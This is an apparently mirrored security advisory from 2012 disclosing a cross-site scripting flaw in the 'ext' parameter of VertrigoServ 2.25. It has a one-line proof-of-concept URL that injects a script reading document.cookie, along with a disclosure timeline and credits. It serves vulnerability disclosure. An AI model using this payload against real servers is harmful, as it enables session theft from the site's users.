Lucene search
SecurityvulnsSECURITYVULNS:DOC:27527HistoryJan 09, 2012 - 12:00 a.m.
VertrigoServ 2.25 Cross-Site-Scripting vulnerability
2012-01-0900:00:00
vulners.com
17
Advisory: VertrigoServ 2.25 Cross-Site-Scripting vulnerability
Advisory ID: INFOSERVE-ADV2011-11
Author: Stefan Schurtz
Contact: [email protected]
Affected Software: Successfully tested on VertrigoServ 2.25
Vendor URL: http://vertrigo.sourceforge.net/
Vendor Status: informed
==========================
Vulnerability Description
VertrigoServ 2.25 'ext' parameter is prone to a Cross-site-Scripting vulnerability
==================
PoC-Exploit
http://[target]/inc/extensions.php?mode=extensions&ext='"</script><script>alert(document.cookie)</script>
=========
Solution
====================
Disclosure Timeline
15-Dec-2011 - informed vendor
16-Dec-2011 - vendor feedback
========
Credits
Vulnerabilitiy found and advisory written by the INFOSERVE security team.
===========
References
http://www.infoserve.de/system/files/advisories/INFOSERVE-ADV2011-11.txt